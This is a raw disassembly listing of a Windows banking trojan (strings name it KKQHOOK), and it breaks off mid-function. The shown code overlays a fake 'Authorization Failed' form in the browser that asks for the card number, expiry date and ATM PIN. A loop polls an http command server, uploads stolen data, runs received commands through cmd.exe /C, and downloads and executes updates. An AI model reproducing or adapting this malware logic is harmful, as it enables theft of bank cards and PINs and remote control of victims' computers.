XREF: sub_41E689r push [ebp+arg_4] ; DATA XREF: sub_41E695r push [ebp+arg_0] ; DATA XREF: sub_41E6A1r call sub_406E94 ; DATA XREF: sub_41E6ADr pop ebp retn sub_405336 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_405350 proc near ; CODE XREF: sub_405AAC+27Ep ; DATA XREF: sub_41E6B9r var_54 = byte ptr -54h var_14 = dword ptr -14h var_10 = byte ptr -10h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 54h ; DATA XREF: sub_41E6C5r push ebx push esi loc_405358: ; DATA XREF: sub_41E6D1r push edi mov esi, [ebp+arg_0] mov eax, [ebp+arg_4] add eax, 40h jge short loc_405367 loc_405364: ; DATA XREF: sub_41E6DDr add eax, 3Fh loc_405367: ; CODE XREF: sub_405350+12j ; DATA XREF: sub_41E6E9r sar eax, 6 mov edi, eax loc_40536C: ; DATA XREF: sub_41E6F5r shl edi, 6 push edi loc_405370: ; DATA XREF: sub_41E701r sub_41E70Dr call sub_40530C pop ecx mov [ebp+var_14], eax ; DATA XREF: sub_41E719r mov eax, [ebp+arg_4] loc_40537C: ; DATA XREF: sub_41E725r add eax, 40h jge short loc_405384 ; DATA XREF: sub_41E731r add eax, 3Fh loc_405384: ; CODE XREF: sub_405350+2Fj ; DATA XREF: sub_41E73Dr sar eax, 6 mov edi, eax ; DATA XREF: sub_41E749r shl edi, 6 loc_40538C: ; DATA XREF: sub_41E755r push edi push [ebp+var_14] loc_405390: ; DATA XREF: sub_41E761r sub_41E76Dr call sub_407AB0 ; RtlZeroMemory push [ebp+arg_4] loc_405398: ; DATA XREF: sub_41E779r push esi push [ebp+var_14] call sub_407E04 add esp, 0Ch lea eax, [ebp+var_10] push eax call sub_406FD2 mov esi, [ebp+var_14] xor ebx, ebx jmp short loc_4053C2 ; --------------------------------------------------------------------------- loc_4053B4: ; CODE XREF: sub_405350+82j push esi lea eax, [ebp+var_10] push eax call sub_406FF9 add esi, 40h inc ebx loc_4053C2: ; CODE XREF: sub_405350+62j mov eax, [ebp+arg_4] add eax, 40h jge short loc_4053CD add eax, 3Fh loc_4053CD: ; CODE XREF: sub_405350+78j sar eax, 6 cmp ebx, eax jl short loc_4053B4 push [ebp+var_14] call sub_405322 lea eax, [ebp+var_54] push eax push [ebp+arg_8] call sub_405336 push 10h lea eax, [ebp+var_10] push eax lea eax, [ebp+var_54] push eax call sub_407DF8 add esp, 18h or eax, eax jz short loc_405403 xor eax, eax inc eax jmp short loc_405405 ; --------------------------------------------------------------------------- loc_405403: ; CODE XREF: sub_405350+ACj xor eax, eax loc_405405: ; CODE XREF: sub_405350+B1j pop edi pop esi pop ebx leave retn sub_405350 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40540A proc near ; CODE XREF: sub_405AAC+1F6p ; sub_405AAC+20Ep var_D = byte ptr -0Dh var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 14h push ebx push esi push edi and [ebp+var_8], 0 and [ebp+var_C], 0 xor esi, esi mov ebx, [ebp+arg_4] mov eax, [ebp+arg_8] add eax, ebx mov [ebp+var_4], eax mov edi, [ebp+arg_0] jmp loc_4054BB ; --------------------------------------------------------------------------- loc_405430: ; CODE XREF: sub_40540A+B9j movsx edx, byte ptr [edi] shl edx, 2 mov esi, dword_4240B8[edx] cmp esi, 0FFFFFFFFh jz short loc_4054BA mov eax, [ebp+var_8] or eax, eax jl short loc_4054B7 cmp eax, 3 jg short loc_4054B7 jmp off_4244B8[eax*4] loc_405455: ; DATA XREF: .data:off_4244B8o inc [ebp+var_8] jmp short loc_4054B7 ; --------------------------------------------------------------------------- loc_40545A: ; CODE XREF: sub_40540A+44j ; DATA XREF: .data:004244BCo mov edx, [ebp+var_C] shl edx, 2 mov ecx, esi and ecx, 30h sar ecx, 4 or edx, ecx mov [ebp+var_D], dl mov eax, ebx inc ebx mov dl, [ebp+var_D] mov [eax], dl inc [ebp+var_8] jmp short loc_4054B7 ; --------------------------------------------------------------------------- loc_40547A: ; CODE XREF: sub_40540A+44j ; DATA XREF: .data:004244C0o mov edx, [ebp+var_C] and edx, 0Fh shl edx, 4 mov ecx, esi and ecx, 3Ch sar ecx, 2 or edx, ecx mov [ebp+var_D], dl mov eax, ebx inc ebx mov dl, [ebp+var_D] mov [eax], dl inc [ebp+var_8] jmp short loc_4054B7 ; --------------------------------------------------------------------------- loc_40549D: ; CODE XREF: sub_40540A+44j ; DATA XREF: .data:004244C4o mov edx, [ebp+var_C] and edx, 3 shl edx, 6 or edx, esi mov [ebp+var_D], dl mov eax, ebx inc ebx mov dl, [ebp+var_D] mov [eax], dl and [ebp+var_8], 0 loc_4054B7: ; CODE XREF: sub_40540A+3Dj ; sub_40540A+42j ... mov [ebp+var_C], esi loc_4054BA: ; CODE XREF: sub_40540A+36j inc edi loc_4054BB: ; CODE XREF: sub_40540A+21j cmp byte ptr [edi], 0 jz short loc_4054C9 cmp ebx, [ebp+var_4] jb loc_405430 loc_4054C9: ; CODE XREF: sub_40540A+B4j cmp byte ptr [edi], 0 jnz short loc_4054D5 mov eax, ebx sub eax, [ebp+arg_4] jmp short loc_4054D8 ; --------------------------------------------------------------------------- loc_4054D5: ; CODE XREF: sub_40540A+C2j or eax, 0FFFFFFFFh loc_4054D8: ; CODE XREF: sub_40540A+C9j pop edi pop esi pop ebx leave retn sub_40540A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4054DD proc near ; CODE XREF: sub_40553F+13p ; sub_40553F+20p ... var_FFF = byte ptr -0FFFh arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp mov eax, 1000h call sub_4078CC push edi push 5 push [ebp+arg_0] call sub_407BA0 ; GetWindow mov edi, eax loc_4054F7: ; CODE XREF: sub_4054DD+5Dj or edi, edi jnz short loc_4054FF xor eax, eax jmp short loc_40553C ; --------------------------------------------------------------------------- loc_4054FF: ; CODE XREF: sub_4054DD+1Cj push 0FFFh lea eax, [ebp+var_FFF] push eax push edi call sub_407BAC ; GetClassNameA push 1 push [ebp+arg_4] lea eax, [ebp+var_FFF] push eax call sub_401429 add esp, 0Ch cmp eax, 0FFFFh jz short loc_405530 mov eax, edi jmp short loc_40553C ; --------------------------------------------------------------------------- loc_405530: ; CODE XREF: sub_4054DD+4Dj push 2 push edi call sub_407BA0 ; GetWindow mov edi, eax jmp short loc_4054F7 ; --------------------------------------------------------------------------- loc_40553C: ; CODE XREF: sub_4054DD+20j ; sub_4054DD+51j pop edi leave retn sub_4054DD endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40553F proc near ; CODE XREF: sub_4068A8+140p var_11C = byte ptr -11Ch var_112 = dword ptr -112h var_10E = dword ptr -10Eh var_10A = dword ptr -10Ah var_106 = dword ptr -106h var_102 = byte ptr -102h var_3 = byte ptr -3 var_2 = word ptr -2 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 11Ch push esi push edi push offset aDocobject ; "DocObject" push [ebp+arg_0] call sub_4054DD mov edi, eax push offset aExplorer ; "Explorer" push edi call sub_4054DD add esp, 10h mov ds:dword_408FEC, eax push 0 push eax call sub_407C90 ; ShowWindow lea eax, [ebp+var_112] push eax push edi call sub_407B88 ; GetWindowRect push 0 push ds:dword_409008 push 0 push edi mov eax, [ebp+var_106] sub eax, [ebp+var_10E] push eax mov eax, [ebp+var_10A] sub eax, [ebp+var_112] push eax push 0 push 0 push 50800000h push offset byte_424E15 push offset aKkqhook ; "KKQHOOK" push 200h call sub_407C9C ; CreateWindowExA mov ds:dword_409124, eax push 0 push ds:dword_409008 push 0 push eax push 3Ch mov eax, [ebp+var_10A] sub eax, [ebp+var_112] sub eax, 64h push eax push 14h push 14h push 50800000h push offset aAuthorizationF ; "\n Authorization Failed." push offset aStatic ; "STATIC" push 0 call sub_407C9C ; CreateWindowExA mov ds:dword_408FE8, eax push 0 push ds:dword_409008 push 0 push ds:dword_409124 push 12Ch mov eax, [ebp+var_10A] sub eax, [ebp+var_112] sub eax, 64h push eax push 51h push 14h push 50800009h push offset byte_424E15 push offset aStatic ; "STATIC" push 0 call sub_407C9C ; CreateWindowExA mov ds:dword_419140, eax push 0 push 2 push 0 push 0 push 5 push 1 push 0 push 0 push 0 push 2BCh push 0 push 0 push 8 push 14h call sub_407D08 ; CreateFontA mov esi, eax push 1 push esi push 30h push ds:dword_408FE8 call sub_407C6C ; SendMessageA push 0 push ds:dword_409008 push 0 push ds:dword_419140 push 12Ch push 32h push 3Ah push 14h push 50800003h push offset byte_424E15 push offset aCombobox ; "COMBOBOX" push 0 call sub_407C9C ; CreateWindowExA mov ds:dword_419150, eax push 0 push ds:dword_409008 push 0 push ds:dword_419140 push 12Ch push 3Ch push 3Ah push 52h push 50800003h push offset byte_424E15 push offset aCombobox ; "COMBOBOX" push 0 call sub_407C9C ; CreateWindowExA mov ds:dword_409000, eax mov [ebp+var_2], 1 jmp short loc_40575A ; --------------------------------------------------------------------------- loc_4056F2: ; CODE XREF: sub_40553F+222j movzx eax, [ebp+var_2] push eax push offset a_2u ; "%.2u" lea eax, [ebp+var_11C] push eax call sub_407E40 lea eax, [ebp+var_11C] push eax push 0 push 143h push ds:dword_419150 call sub_407C6C ; SendMessageA movzx eax, [ebp+var_2] add eax, 4 push eax push offset a20_2u ; "20%.2u" lea eax, [ebp+var_11C] push eax call sub_407E40 add esp, 18h lea eax, [ebp+var_11C] push eax push 0 push 143h push ds:dword_409000 call sub_407C6C ; SendMessageA inc [ebp+var_2] loc_40575A: ; CODE XREF: sub_40553F+1B1j movzx eax, [ebp+var_2] cmp eax, 0Dh jl short loc_4056F2 push 0 push ds:dword_409008 push 0 push ds:dword_409124 push 10h push 67h push 6Eh push 0C3h push 50000000h push offset aYourCardNumber ; "Your card number" push offset aStatic ; "STATIC" push 0 call sub_407C9C ; CreateWindowExA mov ds:dword_408A20, eax push 0 push ds:dword_409008 push 0 push ds:dword_409124 push 10h push 57h push 91h push 0C3h push 50000000h push offset aExpirationDate ; "Expiration date" push offset aStatic ; "STATIC" push 0 call sub_407C9C ; CreateWindowExA mov ds:dword_419148, eax push 0 push ds:dword_409008 push 0 push ds:dword_409124 push 10h push 56h push 0B9h push 0C3h push 50000000h push offset aAtmPinCode ; "ATM PIN-Code" push offset aStatic ; "STATIC" push 0 call sub_407C9C ; CreateWindowExA mov ds:dword_419360, eax push 0 push ds:dword_409008 push 0 push ds:dword_409124 push 10h push 1E4h push 0E6h push 1Eh push 50000000h push offset aUnableToAuthor ; "Unable to authorize. ATM PIN-Code is re"... push offset aStatic ; "STATIC" push 0 call sub_407C9C ; CreateWindowExA mov ds:dword_41914C, eax push 0 push ds:dword_409008 push 0 push ds:dword_409124 push 10h push 0FDh push 0FFh push 1Eh push 50000000h push offset aPleaseMakeCorr ; "Please make corrections and try again." push offset aStatic ; "STATIC" push 0 call sub_407C9C ; CreateWindowExA mov ds:dword_419368, eax push offset byte_419260 lea eax, [ebp+var_102] push eax call sub_407E40 add esp, 8 mov [ebp+var_3], 4 jmp short loc_4058A7 ; --------------------------------------------------------------------------- loc_405897: ; CODE XREF: sub_40553F+36Dj movzx eax, [ebp+var_3] mov [ebp+eax+var_102], 78h add [ebp+var_3], 1 loc_4058A7: ; CODE XREF: sub_40553F+356j mov al, [ebp+var_3] cmp al, 0Ch jb short loc_405897 push 0 push ds:dword_409008 push 0 push ds:dword_419140 push 18h push 82h push 14h push 14h push 50800800h lea eax, [ebp+var_102] push eax push offset aEdit ; "EDIT" push 200h call sub_407C9C ; CreateWindowExA mov ds:dword_40861C, eax push 0 push ds:dword_409008 push 0 push ds:dword_419140 push 18h push 46h push 5Fh push 14h push 50800000h push offset byte_424E15 push offset aEdit ; "EDIT" push 200h call sub_407C9C ; CreateWindowExA mov ds:dword_408FF8, eax push 0 push 78h push 0CCh push eax call sub_407C6C ; SendMessageA push 0 push ds:dword_409008 push 0 push ds:dword_409124 push 17h push 9Bh push 140h push 1Eh push 50800000h push offset aClickOnceToCon ; "Click Once To Continue" push offset aButton ; "BUTTON" push 0 call sub_407C9C ; CreateWindowExA mov ds:dword_419364, eax push 0 push 2 push 0 push 0 push 5 push 1 push 0 push 0 push 0 push 190h push 0 push 0 push 6 push 10h call sub_407D08 ; CreateFontA mov edi, eax push 1 push edi push 30h push ds:dword_419150 call sub_407C6C ; SendMessageA push 1 push edi push 30h push ds:dword_409000 call sub_407C6C ; SendMessageA push 1 push edi push 30h push ds:dword_40861C call sub_407C6C ; SendMessageA push 1 push edi push 30h push ds:dword_408FF8 call sub_407C6C ; SendMessageA push 1 push edi push 30h push ds:dword_419148 call sub_407C6C ; SendMessageA push 1 push edi push 30h push ds:dword_408A20 call sub_407C6C ; SendMessageA push 1 push edi push 30h push ds:dword_419360 call sub_407C6C ; SendMessageA push 1 push edi push 30h push ds:dword_419364 call sub_407C6C ; SendMessageA push 0FFFFFFFCh push ds:dword_419150 call sub_407C18 ; GetWindowLongA mov ds:dword_409010, eax push offset sub_4067EE push 0FFFFFFFCh push ds:dword_419150 call sub_407C24 ; SetWindowLongA push 0FFFFFFFCh push ds:dword_409000 call sub_407C18 ; GetWindowLongA mov ds:dword_408FFC, eax push offset sub_4067EE push 0FFFFFFFCh push ds:dword_409000 call sub_407C24 ; SetWindowLongA push 0FFFFFFFCh push ds:dword_40861C call sub_407C18 ; GetWindowLongA mov ds:dword_408000, eax push offset sub_4067EE push 0FFFFFFFCh push ds:dword_40861C call sub_407C24 ; SetWindowLongA push 0FFFFFFFCh push ds:dword_408FF8 call sub_407C18 ; GetWindowLongA mov ds:dword_408A1C, eax push offset sub_4067EE push 0FFFFFFFCh push ds:dword_408FF8 call sub_407C24 ; SetWindowLongA push ds:dword_419150 call sub_407BB8 ; SetFocus pop edi pop esi leave retn sub_40553F endp ; =============== S U B R O U T I N E ======================================= ; Attributes: noreturn bp-based frame sub_405AAC proc near ; DATA XREF: sub_406344+454o var_556E = byte ptr -556Eh var_4688 = dword ptr -4688h var_4683 = byte ptr -4683h var_4584 = byte ptr -4584h var_4580 = dword ptr -4580h var_457C = dword ptr -457Ch var_4578 = dword ptr -4578h var_4573 = byte ptr -4573h var_456F = byte ptr -456Fh var_3574 = dword ptr -3574h var_3570 = dword ptr -3570h var_356B = byte ptr -356Bh var_256C = byte ptr -256Ch var_2567 = byte ptr -2567h var_1578 = dword ptr -1578h var_1574 = dword ptr -1574h var_156E = byte ptr -156Eh var_156D = byte ptr -156Dh var_111C = byte ptr -111Ch var_1117 = byte ptr -1117h var_1018 = dword ptr -1018h var_1014 = dword ptr -1014h var_1010 = dword ptr -1010h var_100B = byte ptr -100Bh var_F07 = byte ptr -0F07h var_E08 = dword ptr -0E08h var_E04 = byte ptr -0E04h var_604 = dword ptr -604h var_600 = byte ptr -600h var_200 = byte ptr -200h var_1FD = byte ptr -1FDh var_1FB = byte ptr -1FBh var_1A8 = byte ptr -1A8h var_1A7 = byte ptr -1A7h push ebp mov ebp, esp mov eax, 5570h call sub_4078CC push ebx push esi push edi call sub_4079B4 ; GetTickCount push eax call sub_407E4C pop ecx loc_405AC8: ; CODE XREF: sub_405AAC+85Ej push 8 lea eax, [ebp+var_F07] push eax call sub_4013E4 lea eax, [ebp+var_F07] push eax push offset aCWindowsSystem ; "C:\\WINDOWS\\system32" push offset aSS_dat ; "%s\\%s.dat" lea eax, [ebp+var_600] push eax call sub_407E40 lea eax, [ebp+var_600] push eax call sub_4024E0 mov edi, dword_41A0A0 push off_41A0A8[edi*4] push offset aHttpS ; "http://%s" lea edi, [ebp+var_E04] push edi call sub_407E40 push 1 push offset asc_42464A ; "/" mov edi, dword_41A0A0 push off_41A0A8[edi*4] call sub_401429 add esp, 34h cmp eax, 0FFFFh jnz short loc_405B54 push offset aW_php ; "/w.php" lea eax, [ebp+var_E04] push eax call sub_407E64 add esp, 8 loc_405B54: ; CODE XREF: sub_405AAC+92j and [ebp+var_1014], 0 mov [ebp+var_1018], 4 lea eax, [ebp+var_111C] push eax lea eax, [ebp+var_1018] push eax lea eax, [ebp+var_1014] push eax push offset aIfc ; "ifc" push offset aSoftwareMicr_3 ; "Software\\Microsoft\\Windows" push 80000001h call sub_401326 push [ebp+var_1014] push offset a?ifcU ; "?ifc=%u" lea eax, [ebp+var_1117] push eax call sub_407E40 lea eax, [ebp+var_1117] push eax lea eax, [ebp+var_E04] push eax call sub_407E64 lea eax, [ebp+var_604] push eax push 0 push 0 push offset aQ ; "q" push offset aKkqhook ; "KKQHOOK" lea eax, [ebp+var_600] push eax lea eax, [ebp+var_E04] push eax push 0 call sub_403D8E add esp, 4Ch mov esi, eax or esi, esi jnz short loc_405BFD lea eax, [ebp+var_600] push eax call sub_40251A pop ecx jmp loc_406238 ; --------------------------------------------------------------------------- loc_405BFD: ; CODE XREF: sub_405AAC+13Dj and [ebp+var_1014], 0 push 4 push 4 lea eax, [ebp+var_1014] push eax push offset aIfc ; "ifc" push offset aSoftwareMicr_3 ; "Software\\Microsoft\\Windows" push 80000001h call sub_401379 push 0 lea eax, [ebp+var_600] push eax call sub_4014E2 add esp, 20h mov [ebp+var_E08], eax or eax, eax jz loc_406238 lea eax, [ebp+var_600] push eax call sub_407B70 ; DeleteFileA lea eax, [ebp+var_600] push eax call sub_40251A pop ecx xor ebx, ebx jmp loc_40620D ; --------------------------------------------------------------------------- loc_405C62: ; CODE XREF: sub_405AAC+77Bj cmp [ebp+var_200], 0 jz loc_40620D lea ecx, [ebp+var_200] or eax, 0FFFFFFFFh loc_405C78: ; CODE XREF: sub_405AAC+1D1j inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_405C78 cmp eax, 5Ch jb loc_40620D mov [ebp+var_1A8], 0 push 0FFFh lea eax, [ebp+var_256C] push eax lea eax, [ebp+var_1A7] push eax call sub_40540A push 0FFFh lea eax, [ebp+var_356B] push eax lea eax, [ebp+var_200] push eax call sub_40540A add esp, 18h mov [ebp+var_156E], 0 mov [ebp+var_156D], 0 jmp short loc_405CF0 ; --------------------------------------------------------------------------- loc_405CD2: ; CODE XREF: sub_405AAC+25Dj movzx eax, [ebp+var_156D] lea edx, [ebp+eax+var_256C] movsx ecx, byte ptr [edx] sub ecx, eax mov eax, ecx mov [edx], al add [ebp+var_156D], 1 loc_405CF0: ; CODE XREF: sub_405AAC+224j lea ecx, [ebp+var_256C] or eax, 0FFFFFFFFh loc_405CF9: ; CODE XREF: sub_405AAC+252j inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_405CF9 movzx edx, [ebp+var_156D] cmp edx, eax jb short loc_405CD2 lea ecx, [ebp+var_256C] or eax, 0FFFFFFFFh loc_405D14: ; CODE XREF: sub_405AAC+26Dj inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_405D14 lea edx, [ebp+var_356B] push edx push eax lea edi, [ebp+var_256C] push edi call sub_405350 add esp, 0Ch mov [ebp+var_3570], eax push 1 push offset aWpst ; "wpst " lea eax, [ebp+var_256C] push eax call sub_401429 add esp, 0Ch cmp eax, 0 jnz loc_40601D lea eax, [ebp+var_2567] push eax lea eax, [ebp+var_4573] push eax call sub_4078EC mov [ebp+var_3574], 0 mov [ebp+var_4578], 4 lea eax, [ebp+var_4584] push eax lea eax, [ebp+var_4578] push eax lea eax, [ebp+var_3574] push eax push offset aOfstkkq ; "ofstkkq" push offset aSoftwareMicr_4 ; "Software\\Microsoft\\Windows" push 80000001h call sub_401326 add esp, 18h lea eax, [ebp+var_604] push eax push 0 push 0 push offset aQ ; "q" push offset aKkqhook ; "KKQHOOK" lea eax, [ebp+var_600] push eax lea eax, [ebp+var_4573] push eax push offset dword_409020 call sub_403D8E add esp, 20h mov esi, eax cmp esi, 0 jnz short loc_405DF2 lea eax, [ebp+var_600] push eax call sub_40251A add esp, 4 jmp short loc_405E20 ; --------------------------------------------------------------------------- loc_405DF2: ; CODE XREF: sub_405AAC+333j push 4 push 4 lea eax, [ebp+var_604] push eax push offset aOfstkkq ; "ofstkkq" push offset aSoftwareMicr_4 ; "Software\\Microsoft\\Windows" push 80000001h call sub_401379 lea eax, [ebp+var_600] push eax call sub_40251A add esp, 1Ch loc_405E20: ; CODE XREF: sub_405AAC+344j and [ebp+var_3574], 0 mov [ebp+var_4578], 4 lea eax, [ebp+var_4584] push eax lea eax, [ebp+var_4578] push eax lea eax, [ebp+var_3574] push eax push offset aOfstkkqc ; "ofstkkqc" push offset aSoftwareMicr_4 ; "Software\\Microsoft\\Windows" push 80000001h call sub_401326 add esp, 18h push 0 push 0 push 4 push 0 push 0 push 80000000h push offset dword_408010 call sub_407A8C ; CreateFileA mov [ebp+var_457C], eax push 0 push eax call sub_407954 ; GetFileSize mov [ebp+var_4688], eax push [ebp+var_457C] call sub_407984 ; CloseHandle mov eax, [ebp+var_4688] cmp [ebp+var_3574], eax jnb loc_405F5B push 8 lea eax, [ebp+var_4683] push eax call sub_4013E4 lea eax, [ebp+var_4683] push eax push offset aCWindowsSystem ; "C:\\WINDOWS\\system32" push offset aSS_tmp ; "%s\\%s.tmp" lea eax, [ebp+var_600] push eax call sub_407E40 lea eax, [ebp+var_600] push eax call sub_4024E0 lea eax, [ebp+var_604] push eax push 0 push [ebp+var_3574] push offset aQ ; "q" push offset aKkqhook ; "KKQHOOK" lea eax, [ebp+var_600] push eax lea eax, [ebp+var_4573] push eax push offset dword_408010 call sub_403D8E mov esi, eax lea eax, [ebp+var_600] push eax call sub_407B70 ; DeleteFileA lea eax, [ebp+var_600] push eax call sub_40251A add esp, 40h or esi, esi jz short loc_405F5B cmp [ebp+var_604], 0 jz short loc_405F5B push 4 push 4 lea eax, [ebp+var_604] push eax push offset aOfstkkqc ; "ofstkkqc" push offset aSoftwareMicr_4 ; "Software\\Microsoft\\Windows" push 80000001h call sub_401379 add esp, 18h loc_405F5B: ; CODE XREF: sub_405AAC+3F5j ; sub_405AAC+482j ... push 0 push 80h push 3 push 0 push 0 push 80000000h push offset dword_408A40 call sub_407A8C ; CreateFileA mov [ebp+var_4580], eax cmp eax, 0FFFFFFFFh jz loc_406238 push [ebp+var_4580] call sub_407984 ; CloseHandle lea eax, [ebp+var_4573] push eax lea eax, [ebp+var_E04] push eax call sub_407E40 push offset a?dmp2 ; "?dmp=2" lea eax, [ebp+var_E04] push eax call sub_407E64 lea eax, [ebp+var_600] push eax call sub_4024E0 lea eax, [ebp+var_604] push eax push 0 push [ebp+var_3574] push offset aQ ; "q" push offset aKkqhook ; "KKQHOOK" lea eax, [ebp+var_600] push eax lea eax, [ebp+var_E04] push eax push offset dword_408A40 call sub_403D8E mov esi, eax lea eax, [ebp+var_600] push eax call sub_407B70 ; DeleteFileA lea eax, [ebp+var_600] push eax call sub_40251A add esp, 38h or esi, esi jz short loc_40601D push offset dword_408A40 call sub_407B70 ; DeleteFileA loc_40601D: ; CODE XREF: sub_405AAC+2A5j ; sub_405AAC+565j cmp [ebp+var_200], 3Ah jnz loc_40614F cmp [ebp+var_1FD], 3Ah jnz loc_40614F mov [ebp+var_1FD], 0 lea eax, [ebp+var_3574] push eax push offset a02u ; ":%02u" lea eax, [ebp+var_200] push eax call sub_407E58 add esp, 0Ch cmp [ebp+var_3574], 0 jz short loc_40608B call sub_407E28 mov edx, 621B97C3h push ecx mov ecx, eax imul edx sar edx, 7 sar ecx, 1Fh sub edx, ecx mov eax, edx pop ecx mov edi, eax inc edi cmp edi, [ebp+var_3574] ja loc_40620D loc_40608B: ; CODE XREF: sub_405AAC+5B4j cmp ds:dword_408F50, 2 jnz short loc_4060D3 push 400h lea eax, [ebp+var_600] push eax call sub_40799C ; GetSystemDirectoryA lea eax, [ebp+var_600] push eax push offset aSCmd_pif ; "%s\\cmd.pif" lea eax, [ebp+var_100B] push eax call sub_407E40 push offset aCmd_exe ; "\\cmd.exe" lea eax, [ebp+var_600] push eax call sub_407E64 add esp, 14h jmp short loc_406110 ; --------------------------------------------------------------------------- loc_4060D3: ; CODE XREF: sub_405AAC+5E6j push 400h lea eax, [ebp+var_600] push eax call sub_4079E4 ; GetWindowsDirectoryA lea eax, [ebp+var_600] push eax push offset aSCommand_pif ; "%s\\command.pif" lea eax, [ebp+var_100B] push eax call sub_407E40 push offset aCommand_com ; "\\command.com" lea eax, [ebp+var_600] push eax call sub_407E64 add esp, 14h loc_406110: ; CODE XREF: sub_405AAC+625j lea eax, [ebp+var_100B] push eax call sub_407B70 ; DeleteFileA lea eax, [ebp+var_200] add eax, 4 push eax lea eax, [ebp+var_600] push eax push offset aSCS ; "%s /C %s" lea eax, [ebp+var_600] push eax call sub_407E40 add esp, 10h push 0 lea eax, [ebp+var_600] push eax call sub_407B34 ; WinExec loc_40614F: ; CODE XREF: sub_405AAC+578j ; sub_405AAC+585j push 1 push offset aWupd ; "wupd " lea eax, [ebp+var_200] push eax call sub_401429 add esp, 0Ch or eax, eax jnz loc_40620D push 7 lea eax, [ebp+var_F07] push eax call sub_4013E4 lea eax, [ebp+var_F07] push eax push offset aCWindowsSystem ; "C:\\WINDOWS\\system32" push offset aSS_dat ; "%s\\%s.dat" lea eax, [ebp+var_456F] push eax call sub_407E40 lea eax, [ebp+var_1FB] push eax lea eax, [ebp+var_556E] push eax call sub_4078EC push 0 push 0 push 0 push offset aQ ; "q" push offset aXd2 ; "xd2" lea eax, [ebp+var_456F] push eax lea eax, [ebp+var_556E] push eax push 0 call sub_403D8E add esp, 38h mov esi, eax cmp esi, 2 jnz short loc_40620D push 0 lea eax, [ebp+var_456F] push eax call sub_407B34 ; WinExec push 1 push offset aNewver ; "newver" lea eax, [ebp+var_556E] push eax call sub_401429 add esp, 0Ch cmp eax, 0FFFFh jz short loc_40620D push 1 call sub_407DEC pop ecx loc_40620D: ; CODE XREF: sub_405AAC+1B1j ; sub_405AAC+1BDj ... lea eax, [ebp+var_200] push eax push ebx push [ebp+var_E08] call sub_401560 add esp, 0Ch mov ebx, eax or eax, eax jnz loc_405C62 push [ebp+var_E08] call sub_407A68 ; LocalFree loc_406238: ; CODE XREF: sub_405AAC+14Cj ; sub_405AAC+190j ... fld dbl_4245E4 fimul dword_41A0A0 mov edi, eax call sub_407844 xchg eax, edi push edi call sub_407DE0 mov edi, dword_41A0A4 sub edi, eax inc edi mov [ebp+var_1010], edi mov eax, edi mov [ebp-1570h], eax push eax call sub_407DE0 add esp, 8 mov edi, [ebp-1570h] add edi, eax mov [ebp+var_1010], edi mov eax, edi mov edi, dword_41A0A4 sub edi, dword_41A0A0 mov ecx, edi inc ecx xor edx, edx div ecx mov [ebp+var_1574], eax mov [ebp+var_1010], eax call sub_407E28 mov [ebp+var_1578], eax mov eax, dword_41A0A0 mov edx, 66666667h push ecx mov ecx, eax imul edx sar edx, 1 sar ecx, 1Fh sub edx, ecx mov eax, edx pop ecx lea edi, [eax+eax*4] mov edx, [ebp+var_1010] mov ecx, [ebp+var_1578] mov eax, edx imul eax, [ebp+var_1578] mov ecx, 0Ah cdq idiv ecx lea edi, [edi+edx+5] mov dword_41A0A0, edi mov eax, dword_41A0A4 cmp edi, eax jbe short loc_4062FF and dword_41A0A0, 0 loc_4062FF: ; CODE XREF: sub_405AAC+84Aj push 493E0h call sub_407DC8 pop ecx jmp loc_405AC8 sub_405AAC endp ; --------------------------------------------------------------------------- pop edi pop esi pop ebx leave retn 4 ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_406316 proc near ; CODE XREF: sub_406344+Cp var_4 = dword ptr -4 push ebp mov ebp, esp push ecx push edi push offset aKkqhook_28 ; "KKQHOOK_28" push 0 push 1F0001h call sub_407A74 ; OpenMutexA mov [ebp+var_4], eax or eax, eax jz short loc_406341 push eax call sub_407984 ; CloseHandle push 1 call sub_407DEC pop ecx loc_406341: ; CODE XREF: sub_406316+1Bj pop edi leave retn sub_406316 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_406344 proc near ; CODE XREF: sub_407868+5Cp var_750 = dword ptr -750h var_74C = byte ptr -74Ch var_748 = byte ptr -748h var_742 = byte ptr -742h var_643 = byte ptr -643h var_544 = byte ptr -544h var_440 = dword ptr -440h var_43C = dword ptr -43Ch var_438 = byte ptr -438h var_334 = dword ptr -334h var_330 = dword ptr -330h var_32C = byte ptr -32Ch var_2C8 = byte ptr -2C8h var_264 = byte ptr -264h var_160 = byte ptr -160h var_5C = dword ptr -5Ch var_55 = dword ptr -55h var_51 = dword ptr -51h var_4D = dword ptr -4Dh var_49 = dword ptr -49h var_45 = dword ptr -45h var_41 = dword ptr -41h var_3D = dword ptr -3Dh var_39 = dword ptr -39h var_35 = dword ptr -35h var_31 = dword ptr -31h var_2D = byte ptr -2Dh var_27 = byte ptr -27h var_26 = byte ptr -26h var_25 = byte ptr -25h var_1D = byte ptr -1Dh var_1 = byte ptr -1 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 750h push ebx push esi push edi call sub_406316 push 104h lea eax, [ebp+var_160] push eax call sub_40799C ; GetSystemDirectoryA push offset aDriversNdisrd_ ; "\\drivers\\ndisrd.sys" lea eax, [ebp+var_160] push eax call sub_407E64 add esp, 8 push 0 push 0 push 3 push 0 push 0 push 80000001h lea eax, [ebp+var_160] push eax call sub_407A8C ; CreateFileA mov esi, eax cmp esi, 0FFFFFFFFh jnz short loc_4063A3 call sub_40523F jmp short loc_4063A9 ; --------------------------------------------------------------------------- loc_4063A3: ; CODE XREF: sub_406344+56j push esi call sub_407984 ; CloseHandle loc_4063A9: ; CODE XREF: sub_406344+5Dj push offset aEnabledsf ; "enabledsf" call sub_4079F0 ; 